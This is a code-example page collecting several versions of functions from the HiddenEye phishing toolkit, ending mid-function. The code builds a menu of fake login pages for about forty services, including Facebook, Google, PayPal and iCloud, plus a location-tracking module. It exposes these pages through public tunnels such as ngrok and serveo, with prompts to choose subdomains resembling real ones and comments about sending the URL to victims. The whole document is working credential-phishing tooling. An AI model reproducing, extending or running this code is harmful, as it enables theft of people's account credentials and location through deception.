コード例 #1
0
def server_selection(port):  # Question where user must select server
    run_command('clear')
    # print('''
    #    {1}_  _ . ___  ___  ___ _  _  {0}___ _  _ ___{1}
    #    |__| | ]  | ]  | |__ |\ |  {0}|__ \__/ |__{1}
    #    |  | | ]__| ]__| |__ | \|  {0}|__  ||  |__{1}
    #    {0}http://github.com/darksecdevelopers
    #    {0}** BY:DARKSEC ** \n\n-------------------------------\n

    # )
    print(global_localization.hidden_eye_logo)
    print(global_localization.official_website_link)
    print(global_localization.by_darksec)
    print(localization.lang_server_selection["server_selection"])
    print(localization.lang_server_selection["select_any_available_server"])
    print_sorted_as_menu(localization.lang_server_selection["servers_list"])
    choice = input(global_localization.input_line)
    choice = choice.zfill(2)
    if choice == '00':
        run_command('clear')
        start_localhost(port)  # FIXED
    elif choice == '01':
        run_command('clear')
        start_ngrok(port)  # FIXED
    elif choice == '02':
        run_command('clear')
        start_serveo(port)  # ALMOST FIXED
    elif choice == '03':
        run_command('clear')
        start_localxpose(port)  # DOESN'T GET ENTERED CREDENTIALS BACK
    elif choice == '04':
        run_command('clear')
        start_localtunnel(port, True)
    elif choice == '05':
        run_command('clear')
        start_openport(port)
    elif choice == '06':
        run_command('clear')
        start_pagekite(port)
    else:
        run_command('clear')
        return server_selection(port)
コード例 #2
0
ファイル: server_runner.py プロジェクト: laceboot/Hiddeneye
def server_selection(port):  # Question where user must select server
    run_command("clear")
    print(global_localization.hidden_eye_logo)
    print(global_localization.official_website_link)
    print(global_localization.by_darksec)
    print(localization.lang_server_selection["server_selection"])
    print(localization.lang_server_selection["select_any_available_server"])
    print_sorted_as_menu(localization.lang_server_selection["servers_list"])
    choice = input(global_localization.input_line)
    choice = choice.zfill(2)
    if choice == "00":
        run_command("clear")
        start_localhost(port)  # FIXED
    elif choice == "01":
        run_command("clear")
        #  start_ngrok(port)  #  FIXME replace this shit with MVC
        NgrokController().close_latest_connection()
        TerminalController().clear()
        NgrokController().maintain_default_config()
        NgrokController().activate_config_path()
        NgrokController().establish_connection(port=port)
        print(NgrokController().ngrok_url)
    elif choice == "02":
        run_command("clear")
        start_serveo(port)  # TODO ALMOST FIXED
    elif choice == "03":
        run_command("clear")
        start_localxpose(port)  # TODO DOESN'T GET ENTERED CREDENTIALS BACK
    elif choice == "04":
        run_command("clear")
        start_localtunnel(port, True)
    elif choice == "05":
        run_command("clear")
        start_openport(port)
    elif choice == "06":
        run_command("clear")
        start_pagekite(port)
    else:
        run_command("clear")
        return server_selection(port)
コード例 #3
0
def server_selection(port):  # Question where user must select server
    run_command("clear")
    print(global_localization.hidden_eye_logo)
    print(global_localization.official_website_link)
    print(global_localization.by_darksec)
    print(localization.lang_server_selection["server_selection"])
    print(localization.lang_server_selection["select_any_available_server"])
    print_sorted_as_menu(localization.lang_server_selection["servers_list"])
    choice = input(global_localization.input_line)
    choice = choice.zfill(2)
    if choice == "00":
        run_command("clear")
        start_localhost(port)  # FIXED
    elif choice == "01":
        run_command("clear")
        start_ngrok(port)  #FIXED
    elif choice == "02":
        run_command("clear")
        start_serveo(port)
    elif choice == "03":
        run_command("clear")
        start_localhostrun(port)
    elif choice == "04":
        run_command("clear")
        start_localtunnel(port, True)
    elif choice == "05":
        run_command("clear")
        start_openport(port)
    elif choice == "06":
        run_command("clear")
        start_pagekite(port)
    elif choice == "07":
        run_command("clear")
        start_localxpose(port)
    else:
        run_command("clear")
        return server_selection(port)
コード例 #4
0
def start_main_menu():
    run_command("clear")
    print(global_localization.hidden_eye_logo)
    print(localization.lang_start_main_menu["version_by_darksec"])
    print(localization.lang_start_main_menu["short_description"])
    print(localization.lang_start_main_menu["features_summary"])
    print(localization.lang_start_main_menu["down_line"])
    print(localization.lang_start_main_menu["attack_vector_message"])
    print(localization.lang_start_main_menu["phishing_modules_header"])
    print_sorted_as_menu(
        localization.lang_start_main_menu["phishing_modules_list"])
    print(localization.lang_start_main_menu["additional_modules"])
    print_sorted_as_menu(
        localization.lang_start_main_menu["additional_modules_list"])

    option = input(global_localization.input_line)
    option = option.zfill(2)
    if option == "01":
        module_loading_message("Facebook")
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["facebook_operation_modes"])
        custom_option = input(global_localization.input_line)
        start_phishing_page("Facebook", custom_option)
    elif option == "02":
        module_loading_message("Google")
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["google_operation_modes"])
        custom_option = input(global_localization.input_line)
        start_phishing_page("Google", custom_option)
    elif option == "03":
        module_loading_message("LinkedIn")
        custom_option = ""
        start_phishing_page("LinkedIn", custom_option)
    elif option == "04":
        module_loading_message("GitHub")
        custom_option = ""
        start_phishing_page("GitHub", custom_option)
    elif option == "05":
        module_loading_message("StackOverflow")
        custom_option = ""
        start_phishing_page("StackOverflow", custom_option)
    elif option == "06":
        module_loading_message("WordPress")
        custom_option = ""
        start_phishing_page("WordPress", custom_option)
    elif option == "07":
        module_loading_message("Twitter")
        custom_option = ""
        start_phishing_page("Twitter", custom_option)
    elif option == "08":
        module_loading_message("Instagram")
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["instagram_operation_modes"])
        custom_option = input(global_localization.input_line)
        start_phishing_page("Instagram", custom_option)
    elif option == "09":
        module_loading_message("Snapchat")
        custom_option = ""
        start_phishing_page("Snapchat", custom_option)
    elif option == "10":
        module_loading_message("Yahoo")
        custom_option = ""
        start_phishing_page("Yahoo", custom_option)
    elif option == "11":
        module_loading_message("Twitch")
        custom_option = ""
        start_phishing_page("Twitch", custom_option)
    elif option == "12":
        module_loading_message("Microsoft")
        custom_option = ""
        start_phishing_page("Microsoft", custom_option)
    elif option == "13":
        module_loading_message("Steam")
        custom_option = ""
        start_phishing_page("Steam", custom_option)
    elif option == "14":
        module_loading_message("VK")
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["VK_operation_modes"])
        custom_option = input(global_localization.input_line)
        start_phishing_page("VK", custom_option)
    elif option == "15":
        module_loading_message("iCloud")
        custom_option = ""
        start_phishing_page("iCloud", custom_option)
    elif option == "16":
        module_loading_message("GitLab")
        custom_option = ""
        start_phishing_page("GitLab", custom_option)
    elif option == "17":
        module_loading_message("NetFlix")
        custom_option = ""
        start_phishing_page("NetFlix", custom_option)
    elif option == "18":
        module_loading_message("Origin")
        custom_option = ""
        start_phishing_page("Origin", custom_option)
    elif option == "19":
        module_loading_message("Pinterest")
        custom_option = ""
        start_phishing_page("Pinterest", custom_option)
    elif option == "20":
        module_loading_message("ProtonMail")
        custom_option = ""
        start_phishing_page("ProtonMail", custom_option)
    elif option == "21":
        module_loading_message("Spotify")
        custom_option = ""
        start_phishing_page("Spotify", custom_option)
    elif option == "22":
        module_loading_message("Quora")
        custom_option = ""
        start_phishing_page("Quora", custom_option)
    elif option == "23":
        module_loading_message("PornHub")
        custom_option = ""
        start_phishing_page("PornHub", custom_option)
    elif option == "24":
        module_loading_message("Adobe")
        custom_option = ""
        start_phishing_page("Adobe", custom_option)
    elif option == "25":
        module_loading_message("Badoo")
        custom_option = ""
        start_phishing_page("Badoo", custom_option)
    elif option == "26":
        module_loading_message("CryptoCurrency")
        custom_option = ""
        start_phishing_page("CryptoCurrency", custom_option)
    elif option == "27":
        module_loading_message("DevianArt")
        custom_option = ""
        start_phishing_page("DevianArt", custom_option)
    elif option == "28":
        module_loading_message("DropBox")
        custom_option = ""
        start_phishing_page("DropBox", custom_option)
    elif option == "29":
        module_loading_message("eBay")
        custom_option = ""
        start_phishing_page("eBay", custom_option)
    elif option == "30":
        module_loading_message("MySpace")
        custom_option = ""
        start_phishing_page("Myspace", custom_option)
    elif option == "31":
        module_loading_message("PayPal")
        custom_option = ""
        start_phishing_page("PayPal", custom_option)
    elif option == "32":
        module_loading_message("Shopify")
        custom_option = ""
        start_phishing_page("Shopify", custom_option)
    elif option == "33":
        module_loading_message("Verizon")
        custom_option = ""
        start_phishing_page("Verizon", custom_option)
    elif option == "34":
        module_loading_message("Yandex")
        custom_option = ""
        start_phishing_page("Yandex", custom_option)
    elif option == "35":
        module_loading_message("Reddit")
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["reddit_operation_modes"])
        custom_option = input(global_localization.input_line)
        start_phishing_page("Reddit", custom_option)
    elif option == "36":
        module_loading_message("Subitoit")
        custom_option = ""
        start_phishing_page("Subitoit", custom_option)
    elif option == "37":
        module_loading_message("PlayStation")
        custom_option = ""
        start_phishing_page("PlayStation", custom_option)
    elif option == "38":
        module_loading_message("Xbox")
        custom_option = ""
        start_phishing_page("Xbox", custom_option)
    elif option == "39":
        module_loading_message("CUSTOM(1)")
        custom_option = ""
        start_phishing_page("CUSTOM(1)", custom_option)
    elif option == "40":
        module_loading_message("CUSTOM(2)")
        custom_option = ""
        start_phishing_page("CUSTOM(2)", custom_option)
        """PHISHING MODULES BELOW"""

    elif option == "0A":
        module_loading_message("LOCATION")
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.
            lang_start_main_menu["additional_module_location_operation_modes"])
        custom_option = input(global_localization.input_line)
        start_phishing_page("LOCATION", custom_option)
    else:
        start_main_menu()
コード例 #5
0
def start_main_menu():
    run_command("clear")
    print(global_localization.hidden_eye_logo)
    print(localization.lang_start_main_menu["version_by_darksec"])
    print(localization.lang_start_main_menu["short_description"])
    print(localization.lang_start_main_menu["features_summary"])
    print(localization.lang_start_main_menu["down_line"])
    print(localization.lang_start_main_menu["attack_vector_message"])
    print(localization.lang_start_main_menu["phishing_modules_header"])

    # phishing_col_width = max(len(word) for row in phishing_modules_list for word in row) + 2
    # for row in phishing_modules_list:
    # print("".join(word.ljust(phishing_col_width) for word in row).format(default_palette[0], default_palette[2]))
    print_sorted_as_menu(
        localization.lang_start_main_menu["phishing_modules_list"])
    print(localization.lang_start_main_menu["additional_modules"])

    # additional_col_width = max(len(word) for row in additional_modules_list for word in row) + 2
    # for row in additional_modules_list:
    # print("".join(word.ljust(additional_col_width) for word in row).format(default_palette[0], default_palette[2]))
    print_sorted_as_menu(
        localization.lang_start_main_menu["additional_modules_list"])

    option = input(global_localization.input_line)
    option = option.zfill(2)
    if option == "01":
        module_loading_message("Facebook")
        # customOption = input("\nOperation mode:\n {0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2]))
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["facebook_operation_modes"])
        customOption = input(global_localization.input_line)
        start_phishing_page("Facebook", customOption)
    elif option == "02":
        module_loading_message("Google")
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["google_operation_modes"])
        # customOption = input(
        # \n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2]))
        customOption = input(global_localization.input_line)
        start_phishing_page("Google", customOption)
    elif option == "03":
        module_loading_message("LinkedIn")
        customOption = ""
        start_phishing_page("LinkedIn", customOption)
    elif option == "04":
        module_loading_message("GitHub")
        customOption = ""
        start_phishing_page("GitHub", customOption)
    elif option == "05":
        module_loading_message("StackOverflow")
        customOption = ""
        start_phishing_page("StackOverflow", customOption)
    elif option == "06":
        module_loading_message("WordPress")
        customOption = ""
        start_phishing_page("WordPress", customOption)
    elif option == "07":
        module_loading_message("Twitter")
        customOption = ""
        start_phishing_page("Twitter", customOption)
    elif option == "08":
        module_loading_message("Instagram")
        # customOption = input("\nOperation mode:\n n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2]))
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["instagram_operation_modes"])
        customOption = input(global_localization.input_line)
        start_phishing_page("Instagram", customOption)
    elif option == "09":
        module_loading_message("Snapchat")
        customOption = ""
        start_phishing_page("Snapchat", customOption)
    elif option == "10":
        module_loading_message("Yahoo")
        customOption = ""
        start_phishing_page("Yahoo", customOption)
    elif option == "11":
        module_loading_message("Twitch")
        customOption = ""
        start_phishing_page("Twitch", customOption)
    elif option == "12":
        module_loading_message("Microsoft")
        customOption = ""
        start_phishing_page("Microsoft", customOption)
    elif option == "13":
        module_loading_message("Steam")
        customOption = ""
        start_phishing_page("Steam", customOption)
    elif option == "14":
        module_loading_message("VK")
        # customOption = input(
        #    "\nOperation mode:\n
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["VK_operation_modes"])
        customOption = input(global_localization.input_line)
        start_phishing_page("VK", customOption)
    elif option == "15":
        module_loading_message("iCloud")
        customOption = ""
        start_phishing_page("iCloud", customOption)
    elif option == "16":
        module_loading_message("GitLab")
        customOption = ""
        start_phishing_page("GitLab", customOption)
    elif option == "17":
        module_loading_message("NetFlix")
        customOption = ""
        start_phishing_page("NetFlix", customOption)
    elif option == "18":
        module_loading_message("Origin")
        customOption = ""
        start_phishing_page("Origin", customOption)
    elif option == "19":
        module_loading_message("Pinterest")
        customOption = ""
        start_phishing_page("Pinterest", customOption)
    elif option == "20":
        module_loading_message("ProtonMail")
        customOption = ""
        start_phishing_page("ProtonMail", customOption)
    elif option == "21":
        module_loading_message("Spotify")
        customOption = ""
        start_phishing_page("Spotify", customOption)
    elif option == "22":
        module_loading_message("Quora")
        customOption = ""
        start_phishing_page("Quora", customOption)
    elif option == "23":
        module_loading_message("PornHub")
        customOption = ""
        start_phishing_page("PornHub", customOption)
    elif option == "24":
        module_loading_message("Adobe")
        customOption = ""
        start_phishing_page("Adobe", customOption)
    elif option == "25":
        module_loading_message("Badoo")
        customOption = ""
        start_phishing_page("Badoo", customOption)
    elif option == "26":
        module_loading_message("CryptoCurrency")
        customOption = ""
        start_phishing_page("CryptoCurrency", customOption)
    elif option == "27":
        module_loading_message("DevianArt")
        customOption = ""
        start_phishing_page("DevianArt", customOption)
    elif option == "28":
        module_loading_message("DropBox")
        customOption = ""
        start_phishing_page("DropBox", customOption)
    elif option == "29":
        module_loading_message("eBay")
        customOption = ""
        start_phishing_page("eBay", customOption)
    elif option == "30":
        module_loading_message("MySpace")
        customOption = ""
        start_phishing_page("Myspace", customOption)
    elif option == "31":
        module_loading_message("PayPal")
        customOption = ""
        start_phishing_page("PayPal", customOption)
    elif option == "32":
        module_loading_message("Shopify")
        customOption = ""
        start_phishing_page("Shopify", customOption)
    elif option == "33":
        module_loading_message("Verizon")
        customOption = ""
        start_phishing_page("Verizon", customOption)
    elif option == "34":
        module_loading_message("Yandex")
        customOption = ""
        start_phishing_page("Yandex", customOption)
    elif option == "35":
        module_loading_message("Reddit")
        # customOption = input(
        #    "\nOperation mode:\nHiddenEye >>> {1}".format(default_palette[0], default_palette[2]))
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["reddit_operation_modes"])
        customOption = input(global_localization.input_line)
        start_phishing_page("Reddit", customOption)
    elif option == "36":
        module_loading_message("Subitoit")
        customOption = ""
        start_phishing_page("Subitoit", customOption)
    elif option == "37":
        module_loading_message("PlayStation")
        customOption = ""
        start_phishing_page("PlayStation", customOption)
    elif option == "38":
        module_loading_message("Xbox")
        customOption = ""
        start_phishing_page("Xbox", customOption)
    elif option == "39":
        module_loading_message("CUSTOM(1)")
        customOption = ""
        start_phishing_page("CUSTOM(1)", customOption)
    elif option == "40":
        module_loading_message("CUSTOM(2)")
        customOption = ""
        start_phishing_page("CUSTOM(2)", customOption)

    # Below Are Tools And Above Are Phishing Modules..

    elif option == "0A":
        module_loading_message("LOCATION")
        # customOption = input(
        #    "\nOperation mode:\n \n\n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2]))
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.
            lang_start_main_menu["additional_module_location_operation_modes"])
        customOption = input(global_localization.input_line)
        start_phishing_page("LOCATION", customOption)

    else:
        start_main_menu()
コード例 #6
0
def start_serveo(port):
    def is_online():
        serveo = requests.get("http://serveo.net")
        if "temporarily disabled" in serveo.text:
            return False
        return True

    def random(port):
        run_command('clear')
        # print('''
        # {1}_  _ . ___  ___  ___ _  _  {0}___ _  _ ___{1}
        # |__| | ]  | ]  | |__ |\ |  {0}|__ \__/ |__{1}
        # |  | | ]__| ]__| |__ | \|  {0}|__  ||  |__{1}
        # {0}http://github.com/darksecdevelopers
        # {0}** BY:DARKSEC ** \n\n-------------------------------
        #
        # ''')
        print(global_localization.hidden_eye_logo)
        print(global_localization.official_website_link)
        print(global_localization.by_darksec)
        print(global_localization.line_of_dots)
        print(localization.lang_start_serveo["serveo_random_server"])

        # run_command('ssh -o StrictHostKeyChecking=no -o
        # ServerAliveInterval=60 -R 80:localhost:%s serveo.net > link.url 2>
        # /dev/null &' % (port))
        run_command([
            'ssh', '-o', 'StrictHostKeyChecking=no', '-o',
            'ServerAliveInterval=60', '-R', 'localhost:{0}'.format(port),
            'serveo.net', '>', 'link.url'
        ],
                    stdout=DEVNULL,
                    stderr=DEVNULL)
        wait(8)
        try:
            output = check_output("grep -o '.\{0,0\}http.\{0,100\}' link.url",
                                  shell=True)
            url = output.decode("utf-8")
            # print("-\n
            # \n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}

            # ".format(default_palette[0], default_palette[4], default_palette[3], port) + url + "{0}".format(default_palette[4]))
            # print("\n")
            print(localization.lang_start_serveo["send_this_url_suggestion"])
            print(localization.lang_start_localhost["localhost_url"] +
                  '127.0.0.1:' + port)
            print(localization.lang_start_serveo["serveo_url"] + url +
                  default_palette[4])
        except CalledProcessError:

            wait(4)
            run_command('clear')
            return random(port)

    def custom(port):
        # print('''
        # {1}_  _ . ___  ___  ___ _  _  {0}___ _  _ ___{1}
        # |__| | ]  | ]  | |__ |\ |  {0}|__ \__/ |__{1}
        # |  | | ]__| ]__| |__ | \|  {0}|__  ||  |__{1}
        # {0}http://github.com/darksecdevelopers
        # {0}** BY:DARKSEC ** \n\n-------------------------------

        # \n{0}[ CREATE A CUSTOM URL HERE ]{1}!! {0}\n-------------------------------\n

        # \n
        # \n{0}Insert a custom subdomain for serveo'''.format(default_palette[0], default_palette[2]))
        print(global_localization.hidden_eye_logo)
        print(global_localization.official_website_link)
        print(global_localization.by_darksec)
        print(global_localization.line_of_dots)
        print(localization.lang_start_serveo["serveo_custom_server"])
        print(localization.
              lang_start_serveo["make_url_simmilar_to_real_suggestion"])
        print(localization.lang_start_serveo["insert_custom_subdomain"])

        lnk = input(global_localization.input_line)
        if not ".serveo.net" in lnk:
            lnk += ".serveo.net"
        else:
            pass
        # run_command('ssh -o StrictHostKeyChecking=no -o
        # ServerAliveInterval=60 -o ServerAliveCountMax=60 -R
        # %s:80:localhost:%s serveo.net > link.url 2> /dev/null &' % (lnk,
        # port))
        run_command([
            'ssh', '-o', 'StrictHostKeyChecking=no', '-o',
            'ServerAliveInterval=60', '-o',
            'ServerAliveCountMax=60', '-R', '{0}:80:localhost:{1}'.format(
                lnk, port), 'serveo.net', '>', 'link.url'
        ],
                    stdout=DEVNULL,
                    stderr=DEVNULL)
        wait(7)
        try:
            output = check_output("grep -o '.\{0,0\}http.\{0,100\}' link.url",
                                  shell=True)
            url = output.decode("utf-8")
            run_command('clear')
            # print('''
            # {1}_  _ . ___  ___  ___ _  _  {0}___ _  _ ___{1}
            # |__| | ]  | ]  | |__ |\ |  {0}|__ \__/ |__{1}
            # |  | | ]__| ]__| |__ | \|  {0}|__  ||  |__{1}
            # {0}http://github.com/darksecdevelopers
            # {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CUSTOM SERVEO URL ]{1}!! {0}
            # \n-------------------------------'''.format(default_palette[0], default_palette[2]))
            print(global_localization.hidden_eye_logo)
            print(global_localization.official_website_link)
            print(global_localization.by_darksec)
            print(global_localization.line_of_dots)
            print(localization.lang_start_serveo["serveo_custom_server"])

            # print("\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO VICTIMS-
            # \n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}
            # \n{0}[{1}*{0}]{1} SERVEO URL: {2}".format(default_palette[0], default_palette[2], default_palette[3], port) + url + "{0}".format(default_palette[4]))
            print(localization.lang_start_serveo["send_this_url_suggestion"])
            print(localization.lang_start_localhost["localhost_url"] +
                  '127.0.0.1:' + port)
            print(localization.lang_start_serveo["serveo_url"] + url +
                  default_palette[4])

            print("\n")

        except CalledProcessError:
            # print('''\n !!!\n
            #  !!!\n
            #  !! \n''')
            print(localization.lang_start_serveo["failed_to_get_domain"])
            print(localization.lang_start_serveo["suggestion_to_fix_issue"])
            print(localization.
                  lang_start_serveo["you_can_try_to_select_other_domain"])
            wait(4)
            run_command('clear')
            return custom(port)

    if is_online:
        # print('''
        #    {1}_  _ . ___  ___  ___ _  _  {0}___ _  _ ___{1}
        #    |__| | ]  | ]  | |__ |\ |  {0}|__ \__/ |__{1}
        #    |  | | ]__| ]__| |__ | \|  {0}|__  ||  |__{1}
        #    {0}http://github.com/darksecdevelopers
        #    {0}** BY:DARKSEC ** \n\n-------------------------------

        #
        #
        #  '''.format(default_palette[0], default_palette[2]))
        print(global_localization.hidden_eye_logo)
        print(global_localization.official_website_link)
        print(global_localization.by_darksec)
        print(global_localization.line_of_dots)
        print(localization.lang_start_serveo["serveo_url_option_selection"])
        print(localization.lang_start_serveo["serveo_phishing_warning"])
        print(localization.lang_start_serveo["choose_type_of_url"])

        # print(" \n".format(default_palette[0], default_palette[2]))
        print_sorted_as_menu(localization.lang_start_serveo["url_types"])
        choice = input(global_localization.input_line)
        run_command('clear')
        if choice == '1':

            custom(port)
        elif choice == '2':
            random(port)
        else:
            run_command('clear')
            return start_serveo(port)
    else:
        # print("Serveo is DOWN now, do you want to select another option? Y/n")
        print(localization.lang_start_serveo["serveo_is_down"])
        choice = input("HiddenEye >> ")
        choice = choice.lower()
        if choice == 'y':
            return server_selection(port)
        else:
            return start_serveo(port)
コード例 #7
0
def start_serveo(port):
    def is_online():
        try:
            serveo = requests.get("http://serveo.net", timeout=5)
            if "temporarily disabled" in serveo.text:
                return False
            return True
        except:
            return False

    def random(port):
        run_command("clear")
        print(global_localization.hidden_eye_logo)
        print(global_localization.official_website_link)
        print(global_localization.by_darksec)
        print(global_localization.line_of_dots)
        print(localization.lang_start_serveo["serveo_random_server"])

        run_command(
            [
                "ssh",
                "-o",
                "StrictHostKeyChecking=no",
                "-o",
                "ServerAliveInterval=60",
                "-R",
                "localhost:{0}".format(port),
                "serveo.net",
                ">",
                "link.url",
            ],
            stdout=DEVNULL,
            stderr=DEVNULL,
        )
        wait(8)
        try:
            output = check_output("grep -o '.\{0,0\}http.\{0,100\}' link.url",
                                  shell=True)
            url = output.decode("utf-8")
            print(localization.lang_start_serveo["send_this_url_suggestion"])
            print(localization.lang_start_localhost["localhost_url"] +
                  "127.0.0.1:" + port)
            print(localization.lang_start_serveo["serveo_url"] + url +
                  default_palette[4])
        except CalledProcessError:
            wait(4)
            run_command("clear")
            return random(port)

    def custom(port):
        print(global_localization.hidden_eye_logo)
        print(global_localization.official_website_link)
        print(global_localization.by_darksec)
        print(global_localization.line_of_dots)
        print(localization.lang_start_serveo["serveo_custom_server"])
        print(localization.
              lang_start_serveo["make_url_simmilar_to_real_suggestion"])
        print(localization.lang_start_serveo["insert_custom_subdomain"])
        lnk = input(global_localization.input_line)
        run_background_command(
            [
                "ssh",
                "-o",
                "StrictHostKeyChecking=no",
                "-o",
                "ServerAliveInterval=60",
                "-o",
                "ServerAliveCountMax=60",
                "-R",
                "{0}:80:localhost:{1}".format(lnk, port),
                "serveo.net",
                ">",
                "link.url",
            ],
            stdout=DEVNULL,
            stderr=DEVNULL,
        )
        lnk += ".serveousercontent.com"
        wait(7)
        try:
            run_command("clear")
            print(global_localization.hidden_eye_logo)
            print(global_localization.official_website_link)
            print(global_localization.by_darksec)
            print(global_localization.line_of_dots)
            print(localization.lang_start_serveo["serveo_custom_server"])
            print(localization.lang_start_serveo["send_this_url_suggestion"])
            print(localization.lang_start_localhost["localhost_url"] +
                  "127.0.0.1:" + port)
            print(localization.lang_start_serveo["serveo_url"] + lnk +
                  default_palette[4])

            print("\n")

        except CalledProcessError:
            print(localization.lang_start_serveo["failed_to_get_domain"])
            print(localization.lang_start_serveo["suggestion_to_fix_issue"])
            print(localization.
                  lang_start_serveo["you_can_try_to_select_other_domain"])
            wait(4)
            run_command("clear")
            return custom(port)

    if is_online():
        print(global_localization.hidden_eye_logo)
        print(global_localization.official_website_link)
        print(global_localization.by_darksec)
        print(global_localization.line_of_dots)
        print(localization.lang_start_serveo["serveo_url_option_selection"])
        print(localization.lang_start_serveo["serveo_phishing_warning"])
        print(localization.lang_start_serveo["choose_type_of_url"])
        print_sorted_as_menu(localization.lang_start_serveo["url_types"])
        choice = input(global_localization.input_line)
        run_command("clear")
        if choice == "1":

            custom(port)
        elif choice == "2":
            random(port)
        else:
            run_command("clear")
            return start_serveo(port)
    else:
        print(localization.lang_start_serveo["serveo_is_down"])
        choice = input("HiddenEye >> ")
        choice = choice.lower()
        if choice == "y":
            return server_selection(port)
        else:
            return start_serveo(port)
コード例 #8
0
ファイル: main_runner.py プロジェクト: nilesh980/hiddeneye
def start_main_menu():
    run_command('clear')
    print(global_localization.hidden_eye_logo)
    print(localization.lang_start_main_menu["version_by_darksec"])
    print(localization.lang_start_main_menu["short_description"])
    print(localization.lang_start_main_menu["features_summary"])
    print(localization.lang_start_main_menu["down_line"])
    print(localization.lang_start_main_menu["attack_vector_message"])
    print(localization.lang_start_main_menu["phishing_modules_header"])

    #phishing_col_width = max(len(word) for row in phishing_modules_list for word in row) + 2
    #for row in phishing_modules_list:
    #print("".join(word.ljust(phishing_col_width) for word in row).format(default_palette[0], default_palette[2]))
    print_sorted_as_menu(
        localization.lang_start_main_menu["phishing_modules_list"])
    print(localization.lang_start_main_menu["additional_modules"])

    #additional_col_width = max(len(word) for row in additional_modules_list for word in row) + 2
    #for row in additional_modules_list:
    #print("".join(word.ljust(additional_col_width) for word in row).format(default_palette[0], default_palette[2]))
    print_sorted_as_menu(
        localization.lang_start_main_menu["additional_modules_list"])

    option = input(global_localization.input_line)
    option = option.zfill(2)
    if option == '01':
        module_loading_message('Facebook')
        #customOption = input("\nOperation mode:\n {0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2]))
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["facebook_operation_modes"])
        customOption = input(global_localization.input_line)
        start_phishing_page('Facebook', customOption)
    elif option == '02':
        module_loading_message('Google')
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["google_operation_modes"])
        #customOption = input(
        #\n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2]))
        customOption = input(global_localization.input_line)
        start_phishing_page('Google', customOption)
    elif option == '03':
        module_loading_message('LinkedIn')
        customOption = ''
        start_phishing_page('LinkedIn', customOption)
    elif option == '04':
        module_loading_message('GitHub')
        customOption = ''
        start_phishing_page('GitHub', customOption)
    elif option == '05':
        module_loading_message('StackOverflow')
        customOption = ''
        start_phishing_page('StackOverflow', customOption)
    elif option == '06':
        module_loading_message('WordPress')
        customOption = ''
        start_phishing_page('WordPress', customOption)
    elif option == '07':
        module_loading_message('Twitter')
        customOption = ''
        start_phishing_page('Twitter', customOption)
    elif option == '08':
        module_loading_message('Instagram')
        #customOption = input("\nOperation mode:\n n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2]))
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["instagram_operation_modes"])
        customOption = input(global_localization.input_line)
        start_phishing_page('Instagram', customOption)
    elif option == '09':
        module_loading_message('Snapchat')
        customOption = ''
        start_phishing_page('Snapchat', customOption)
    elif option == '10':
        module_loading_message('Yahoo')
        customOption = ''
        start_phishing_page('Yahoo', customOption)
    elif option == '11':
        module_loading_message('Twitch')
        customOption = ''
        start_phishing_page('Twitch', customOption)
    elif option == '12':
        module_loading_message('Microsoft')
        customOption = ''
        start_phishing_page('Microsoft', customOption)
    elif option == '13':
        module_loading_message('Steam')
        customOption = ''
        start_phishing_page('Steam', customOption)
    elif option == '14':
        module_loading_message('VK')
        #customOption = input(
        #    "\nOperation mode:\n
        print(localization.lang_start_main_menu["operation_mode"])
        print_sorted_as_menu(
            localization.lang_start_main_menu["VK_operation_modes"])
        customOption = input(global_localization.input_line)
        start_phishing_page('VK', customOption)
    elif option == '15':
        module_loading_message('iCloud')
        customOption = ''
        start_phishing_page('iCloud', customOption)
    elif option == '16':
        module_loading_message('GitLab')
        customOption = ''
        start_phishing_page('GitLab', customOption)
    elif option == '17':
        module_loading_message('NetFlix')
        customOption = ''
        start_phishing_page('NetFlix', customOption)
    elif option == '18':
        module_loading_message('Origin')
        customOption = ''
        start_phishing_page('Origin', customOption)
    elif option == '19':
        module_loading_message('Pinterest')
        customOption = ''
        start_phishing_page('Pinterest', customOption)
    elif option == '20':
        module_loading_message('ProtonMail')
        customOption = ''
        start_phishing_page('ProtonMail', customOption)
    elif option == '21':
        module_loading_message('Spotify')
        customOption = ''
        start_phishing_page('Spotify', customOption)
    elif option == '22':
        module_loading_message('Quora')
        customOption = ''
        start_phishing_page('Quora', customOption)
    elif option == '23':
        module_loading_message('PornHub')
        customOption = ''
        start_phishing_page('PornHub', customOption)
    elif option == '24':
        module_loading_message('Adobe')
        customOption = ''
        start_phishing_page('Adobe', customOption)
    elif option == '25':
        module_loading_message('Badoo')
        customOption = ''
        start_phishing_page('Badoo', customOption)
    elif option == '26':
        module_loading_message('CryptoCurrency')
        customOption = ''
